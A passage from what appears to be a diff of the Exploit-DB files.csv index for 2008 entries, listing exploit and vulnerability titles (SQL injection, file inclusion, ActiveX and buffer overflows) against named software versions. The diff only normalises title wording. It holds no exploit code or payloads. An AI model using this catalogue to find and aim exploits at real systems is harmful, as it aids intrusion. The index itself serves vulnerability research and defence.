Vulnerability",2008-04-22,1ten0.0net1,php,webapps,0 5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 (index.php ID_loc) SQL Injection Vulnerability",2008-04-23,JiKo,php,webapps,0 5488,platforms/php/webapps/5488.txt,"Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability",2008-04-23,str0xo,php,webapps,0 5489,platforms/windows/remote/5489.html,"Zune Software ActiveX Arbitrary File Overwrite Exploit",2008-04-23,"ilion security",windows,remote,0 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script (spages.php) Remote Code Execution Exploit",2008-04-23,Inphex,php,webapps,0 -5491,platforms/php/webapps/5491.txt,"Joomla Community Builder <= 1.0.1 Blind SQL Injection Vulnerability",2008-04-23,$hur!k'n,php,webapps,0 +5491,platforms/php/webapps/5491.txt,"Joomla Community Builder <= 1.0.1 - Blind SQL Injection Vulnerability",2008-04-23,$hur!k'n,php,webapps,0 5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 SRT File Subtitle Parsing Buffer Overflow Exploit",2008-04-24,lhoang8500,windows,local,0 5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth)",2008-04-24,His0k4,php,webapps,0 -5494,platforms/php/webapps/5494.txt,"miniBB 2.2 (CSS/SQL/FPD) Multiple Remote Vulnerabilities",2008-04-25,girex,php,webapps,0 +5494,platforms/php/webapps/5494.txt,"minibb 2.2 (css/sql/fpd) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule (eid) SQL Injection Vulnerability",2008-04-25,Kacper,php,webapps,0 5496,platforms/windows/remote/5496.html,"WatchFire Appscan 7.0 ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability",2008-04-25,NoGe,php,webapps,0 5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit",2008-04-25,j0rgan,windows,local,0 -5499,platforms/php/webapps/5499.txt,"Siteman 2.x (EXEC/LFI/XSS) Multiple Remote Vulnerabilities",2008-04-26,IRCRASH,php,webapps,0 +5499,platforms/php/webapps/5499.txt,"siteman 2.x (exec/lfi/xss) Multiple Vulnerabilities",2008-04-26,IRCRASH,php,webapps,0 5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames <= 2.5 SQL Injection Vulnerabilities",2008-04-26,Kacper,php,webapps,0 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 RFI Vulnerabiltiies",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 (postview.php) Remote SQL Injection Exploit",2008-04-26,U238,php,webapps,0 5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 Multiple Remote SQL injection Vulnerabilities",2008-04-26,U238,asp,webapps,0 5504,platforms/php/webapps/5504.txt,"PHP Forge <= 3 beta 2 (id) Remote SQL Injection Vulnerability",2008-04-26,JiKo,php,webapps,0 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability",2008-04-26,Cr@zy_King,php,webapps,0 -5506,platforms/php/webapps/5506.txt,"PHPizabi v0.848b C1 HFP3 Database Information Disclosure Vuln",2008-04-26,YOUCODE,php,webapps,0 -5507,platforms/asp/webapps/5507.txt,"MegaBBS Forum 2.2 (SQL/XSS) Multiple Remote Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0 +5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure Vuln",2008-04-26,YOUCODE,php,webapps,0 +5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 (sql/xss) Multiple Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0 5508,platforms/php/webapps/5508.txt,"Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability",2008-04-27,ProgenTR,php,webapps,0 5509,platforms/php/webapps/5509.txt,"FluentCMS (view.php sid) Remote SQL Injection Vulnerability",2008-04-27,cO2,php,webapps,0 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 File Disclosure Vuln",2008-04-27,Houssamix,php,webapps,0 5511,platforms/windows/remote/5511.html,"HP Software Update (Hpufunction.dll 4.0.0.1) Insecure Method PoC",2008-04-27,callAX,windows,remote,0 5512,platforms/php/webapps/5512.pl,"Joomla Component com_alphacontent Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 -5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 +5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection Exploit",2008-04-27,ZAMUT,php,webapps,0 5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) SQL Injection Vulnerability",2008-04-28,K-159,php,webapps,0 @@ -5159,7 +5159,7 @@ id,file,description,date,author,platform,type,port 5526,platforms/php/webapps/5526.txt,"interact 2.4.1 Multiple Remote File Inclusion Vulnerabilities",2008-04-30,RoMaNcYxHaCkEr,php,webapps,0 5527,platforms/php/webapps/5527.pl,"Joomla Component Webhosting (catid) Blind SQL Injection Exploit",2008-05-01,cO2,php,webapps,0 5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability",2008-05-01,IRCRASH,php,webapps,0 -5529,platforms/php/webapps/5529.txt,"vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities",2008-05-01,IRCRASH,php,webapps,0 +5529,platforms/php/webapps/5529.txt,"vlbook 1.21 (xss/lfi) Multiple Vulnerabilities",2008-05-01,IRCRASH,php,webapps,0 5530,platforms/windows/remote/5530.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit",2008-05-02,lhoang8500,windows,remote,0 5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities",2008-05-02,InjEctOr5,php,webapps,0 5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability",2008-05-02,Cod3rZ,php,webapps,0 @@ -5168,7 +5168,7 @@ id,file,description,date,author,platform,type,port 5535,platforms/php/webapps/5535.txt,"Smartblog (index.php tid) Remote SQL Injection Vulnerability",2008-05-03,His0k4,php,webapps,0 5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit",2008-05-03,SkOd,windows,remote,0 5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 Multiple Remote SQL Injection Vulnerabilities",2008-05-03,InjEctOr5,php,webapps,0 -5538,platforms/php/webapps/5538.txt,"cpLinks 1.03 (bypass/SQL/XXS) Multiple Remote Vulnerabilities",2008-05-04,InjEctOr5,php,webapps,0 +5538,platforms/php/webapps/5538.txt,"cplinks 1.03 (bypass/sql/xxs) Multiple Vulnerabilities",2008-05-04,InjEctOr5,php,webapps,0 5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 (example.php site) Remote File Inclusion Vulnerability",2008-05-04,Silver,php,webapps,0 5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit",2008-05-04,JosS,php,webapps,0 5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia <= 0.2.0 SQL Injection Vulnerability",2008-05-05,K-159,php,webapps,0 @@ -5180,7 +5180,7 @@ id,file,description,date,author,platform,type,port 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability",2008-05-05,Nicob,windows,dos,0 5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 Remote File Disclosure / Edit Vulnerability",2008-05-05,"Virangar Security",php,webapps,0 -5550,platforms/php/webapps/5550.php,"DeluxeBB <= 1.2 Multiple Remote Vulnerabilities Exploit",2008-05-05,EgiX,php,webapps,0 +5550,platforms/php/webapps/5550.php,"deluxebb <= 1.2 Multiple Vulnerabilities exploit",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 (search.php search) SQL Injection Vulnerability",2008-05-06,t0pP8uZz,php,webapps,0 5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 (cat_id) Remote SQL Injection Vulnerability",2008-05-06,InjEctOr5,php,webapps,0 5553,platforms/asp/webapps/5553.txt,"fipsCMS (print.asp lg) Remote SQL Injection Vulnerability",2008-05-07,InjEctOr5,asp,webapps,0 @@ -5207,7 +5207,7 @@ id,file,description,date,author,platform,type,port 5580,platforms/php/webapps/5580.txt,"Ktools PhotoStore <= 3.5.1 (gallery.php gid) SQL Injection Vulnerability",2008-05-09,Mr.SQL,php,webapps,0 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability",2008-05-10,His0k4,php,webapps,0 5582,platforms/php/webapps/5582.txt,"Ktools PhotoStore <= 3.5.2 Multiple SQL Injection Vulnerabilities",2008-05-10,DNX,php,webapps,0 -5583,platforms/php/webapps/5583.php,"Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit",2008-05-10,+toxa+,php,webapps,0 +5583,platforms/php/webapps/5583.php,"Joomla Component com_datsogallery 1.6 - Blind SQL Injection Exploit",2008-05-10,+toxa+,php,webapps,0 5584,platforms/windows/local/5584.c,"Open Office.org 2.31 swriter Local Code Execution Exploit",2008-05-10,Marsu,windows,local,0 5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 process_redirect_pdu() BSS Overflow Vulnerability PoC",2008-05-11,"Guido Landi",linux,dos,0 5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 Multiple Remote File Inclusion Vulnerabilities",2008-05-11,CraCkEr,php,webapps,0 @@ -5218,7 +5218,7 @@ id,file,description,date,author,platform,type,port 5591,platforms/php/webapps/5591.txt,"AJ Auction <= 6.2.1 (classifide_ad.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 (index.php) Remote SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 5594,platforms/php/webapps/5594.txt,"ZeusCart <= 2.0 (category_list.php) SQL Injection Vulnerability",2008-05-12,t0pP8uZz,php,webapps,0 -5595,platforms/php/webapps/5595.txt,"ClanLite 2.x (SQL Injection/XSS) Multiple Remote Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 +5595,platforms/php/webapps/5595.txt,"clanlite 2.x (sql injection/xss) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0 5596,platforms/php/webapps/5596.txt,"BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities",2008-05-12,BiNgZa,php,webapps,0 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script <= 1.5.x Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability",2008-05-12,TurkishWarriorr,php,webapps,0 @@ -5235,7 +5235,7 @@ id,file,description,date,author,platform,type,port 5609,platforms/php/webapps/5609.txt,"EMO Realty Manager (news.php ida) SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 5610,platforms/php/webapps/5610.txt,"The Real Estate Script (dpage.php docID) SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 5611,platforms/php/webapps/5611.txt,"Linkspile (link.php cat_id) Remote SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 -5612,platforms/windows/remote/5612.html,"IDAutomation Bar Code ActiveX Multiple Remote Vulnerabilities",2008-05-14,shinnai,windows,remote,0 +5612,platforms/windows/remote/5612.html,"idautomation bar code activex Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 (browseproject.php) SQL Injection Vuln",2008-05-14,t0pP8uZz,php,webapps,0 5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 (detail.php) SQL Injection Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 @@ -5243,11 +5243,11 @@ id,file,description,date,author,platform,type,port 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0 5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 5619,platforms/windows/remote/5619.html,"MS Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 -5620,platforms/php/webapps/5620.txt,"Rgboard <= 3.0.12 (RFI/XSS) Multiple Remote Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 +5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/xss) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0 5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit",2008-05-15,"Markus Mueller",multiple,remote,22 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0 -5624,platforms/php/webapps/5624.txt,"Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 +5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 (rfi/rfd/sql/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 (category.php cat) SQL Injection Vulnerability",2008-05-15,HaCkeR_EgY,php,webapps,0 5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System <= 2.0 Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 @@ -5267,19 +5267,19 @@ id,file,description,date,author,platform,type,port 5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS Multiple Remote SQL Injection Vulnerabilities",2008-05-18,dun,php,webapps,0 5643,platforms/php/webapps/5643.txt,"Ajax framework (lang) Local File Inclusion Vulnerability",2008-05-18,dun,php,webapps,0 -5644,platforms/php/webapps/5644.txt,"LulieBlog 1.2 Multiple Remote Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 +5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0 5645,platforms/php/webapps/5645.txt,"AlkalinePHP <= 0.77.35 (adduser.php) Arbitrary Add-Admin Vuln",2008-05-18,t0pP8uZz,php,webapps,0 -5646,platforms/php/webapps/5646.txt,"easyCMS <= 0.4.2 Multiple Remote Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 +5646,platforms/php/webapps/5646.txt,"easycms <= 0.4.2 Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0 5647,platforms/php/webapps/5647.txt,"GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability",2008-05-18,t0pP8uZz,php,webapps,0 5648,platforms/php/webapps/5648.pl,"MeltingIce File System <= 1.0 Remote Arbitrary Add-User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System <= 1.1a Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5651,platforms/php/webapps/5651.txt,"microSSys CMS <= 1.5 Remote File Inclusion Vulnerability",2008-05-19,Raz0r,php,webapps,0 +5651,platforms/php/webapps/5651.txt,"microssys cms <= 1.5 - Remote File Inclusion Vulnerability",2008-05-19,Raz0r,php,webapps,0 5652,platforms/php/webapps/5652.pl,"AlkalinePHP <= 0.80.00 beta (thread.php id) SQL Injection Exploit",2008-05-19,Stack,php,webapps,0 5653,platforms/php/webapps/5653.php,"MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit",2008-05-19,EgiX,php,webapps,0 5654,platforms/php/webapps/5654.txt,"EntertainmentScript (play.php id) Remote SQL Injection Vulnerability",2008-05-19,Mr.SQL,php,webapps,0 5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 (page.php page) Local File Inclusion Exploit",2008-05-20,Stack,php,webapps,0 -5656,platforms/php/webapps/5656.txt,"eCMS 0.4.2 (SQL/PB) Multiple Remote Vulnerabilities",2008-05-20,"Virangar Security",php,webapps,0 +5656,platforms/php/webapps/5656.txt,"ecms 0.4.2 (sql/pb) Multiple Vulnerabilities",2008-05-20,"Virangar Security",php,webapps,0 5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 (CE/XSS/CSRF) Multiple Vulnerabilities",2008-05-20,USH,php,webapps,0 5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 (index.php comic_id) Remote SQL Injection Vulnerability",2008-05-20,Niiub,php,webapps,0 5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability",2008-05-20,cOndemned,php,webapps,0 @@ -5287,15 +5287,15 @@ id,file,description,date,author,platform,type,port 5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 (index.php pageid) SQL Injection Vulnerability",2008-05-21,InjEctOr5,php,webapps,0 5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 Remote Command Execution Vuln",2008-05-21,DSecRG,cgi,webapps,0 5663,platforms/php/webapps/5663.txt,"6rbScript (news.php newsid) Remote SQL Injection Vulnerability",2008-05-21,"Hussin X",php,webapps,0 -5664,platforms/php/webapps/5664.txt,"Webl?sninger <= 4 - (XSS/SQL) Multiple Remote Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 +5664,platforms/php/webapps/5664.txt,"webl?sninger <= 4 - (xss/sql) Multiple Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 5665,platforms/php/webapps/5665.txt,"Netbutikker <= 4 - Remote SQL Injection Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0 5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 (uid) Blind SQL Injection Vulnerability",2008-05-22,"Virangar Security",php,webapps,0 5667,platforms/windows/local/5667.py,"VLC 0.8.6d SSA Parsing Double Sh311 Universal Exploit",2008-05-23,j0rgan,windows,local,0 -5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 (RFI/LFI/XSS/DT) Multiple Remote Vulnerabilities",2008-05-23,DSecRG,php,webapps,0 +5668,platforms/php/webapps/5668.txt,"quate cms 0.3.4 (rfi/lfi/xss/dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0 5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 (install_mod.php) Local File Inclusion Vulnerability",2008-05-23,DSecRG,php,webapps,0 5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 (idresa) Remote SQL Injection Vulnerability",2008-05-24,His0k4,php,webapps,0 5671,platforms/php/webapps/5671.txt,"phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability",2008-05-24,Kacak,php,webapps,0 -5672,platforms/php/webapps/5672.txt,"plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability",2008-05-25,DR.TOXIC,php,webapps,0 +5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion Vulnerability",2008-05-25,DR.TOXIC,php,webapps,0 5673,platforms/php/webapps/5673.txt,"Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities",2008-05-25,DNX,php,webapps,0 5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 Arbitrary Add Admin User Vulnerability",2008-05-26,Stack,php,webapps,0 5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 Multiple Remote SQL Injection Vulnerabilities",2008-05-26,"Virangar Security",php,webapps,0 @@ -5324,7 +5324,7 @@ id,file,description,date,author,platform,type,port 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0 5701,platforms/php/webapps/5701.txt,"Social Site Generator (sgc_id) Remote SQL Injection Vulnerability",2008-05-31,"DeAr Ev!L",php,webapps,0 -5702,platforms/php/webapps/5702.txt,"AzureSites CMS Multiple Remote Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 +5702,platforms/php/webapps/5702.txt,"azuresites cms Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 5703,platforms/php/webapps/5703.txt,"PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability",2008-05-31,Lidloses_Auge,php,webapps,0 5704,platforms/php/webapps/5704.txt,"PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability",2008-05-31,mozi,php,webapps,0 5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability",2008-05-31,JosS,asp,webapps,0 @@ -5336,33 +5336,33 @@ id,file,description,date,author,platform,type,port 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 5712,platforms/multiple/dos/5712.pl,"Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC",2008-06-01,"Guido Landi",multiple,dos,0 5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability",2008-06-01,JosS,php,webapps,0 -5714,platforms/php/webapps/5714.pl,"Joomla Component com_mycontent 1.1.13 Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 +5714,platforms/php/webapps/5714.pl,"Joomla Component com_mycontent 1.1.13 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta Multiple Remote File Inclusion Vulnerabilities",2008-06-01,MK,php,webapps,0 -5716,platforms/php/webapps/5716.txt,"meBiblio 0.4.7 (SQL/Upload/XSS) Multiple Remote Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 +5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 (sql/upload/xss) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store <= 1.3 Beta SQL Injection Vulnerability",2008-06-01,KnocKout,asp,webapps,0 5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC",2008-06-01,securfrog,windows,dos,0 -5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 +5719,platforms/php/webapps/5719.pl,"Joomla Component JooBB 0.5.9 - Blind SQL Injection Exploit",2008-06-01,His0k4,php,webapps,0 5720,platforms/linux/remote/5720.py,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit",2008-06-02,His0k4,php,webapps,0 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0 5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 Remote SQL injection Vulnerability",2008-06-02,His0k4,php,webapps,0 5724,platforms/php/webapps/5724.txt,"pLog (albumId) Remote SQL Injection Vulnerability",2008-06-02,DreamTurk,php,webapps,0 -5725,platforms/php/webapps/5725.txt,"SMEweb 1.4b (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 +5725,platforms/php/webapps/5725.txt,"smeweb 1.4b (sql/xss) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 5727,platforms/windows/dos/5727.pl,"MDaemon <= 9.6.5 Multiple Remote Buffer Overflow Exploit PoC",2008-06-02,securfrog,windows,dos,0 5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability",2008-06-03,"ilker Kandemir",php,webapps,0 5729,platforms/php/webapps/5729.txt,"Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability",2008-06-03,His0k4,php,webapps,0 5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability",2008-06-03,His0k4,php,webapps,0 5731,platforms/php/webapps/5731.txt,"Battle Blog <= 1.25 (comment.asp) Remote SQL Injection Vulnerability",2008-06-03,Bl@ckbe@rD,php,webapps,0 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX Remote Download & Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 -5733,platforms/php/webapps/5733.txt,"QuickerSite 1.8.5 Multiple Remote Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 -5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 Blind SQL Injection Exploit",2008-06-03,His0k4,php,webapps,0 +5733,platforms/php/webapps/5733.txt,"quickersite 1.8.5 Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 +5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection Exploit",2008-06-03,His0k4,php,webapps,0 5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script Code Execution Vulnerability",2008-06-03,JiKo,php,webapps,0 5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader <= 1.2.1.a Blind SQL injection Exploit",2008-06-04,His0k4,php,webapps,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book <= 3.1.5 (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit",2008-06-04,ZAMUT,php,webapps,0 5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 -5742,platforms/php/webapps/5742.txt,"427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 +5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 (sql/xss) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 5743,platforms/php/webapps/5743.txt,"Joomla Component simpleshop <= 3.4 SQL injection Vulnerability",2008-06-05,His0k4,php,webapps,0 5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability",2008-06-05,MustLive,php,webapps,0 5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a (shownews) Remote SQL Injection Vulnerability",2008-06-05,n/a,php,webapps,0 @@ -5374,8 +5374,8 @@ id,file,description,date,author,platform,type,port 5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22 5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability",2008-06-07,His0k4,php,webapps,0 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0 -5754,platforms/php/webapps/5754.txt,"PHPInv 0.8.0 (LFI/XSS) Multiple Remote Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 -5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment <= 1.16 Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 +5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 (lfi/xss) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 +5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment <= 1.16 - Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 (filename) File Disclosure 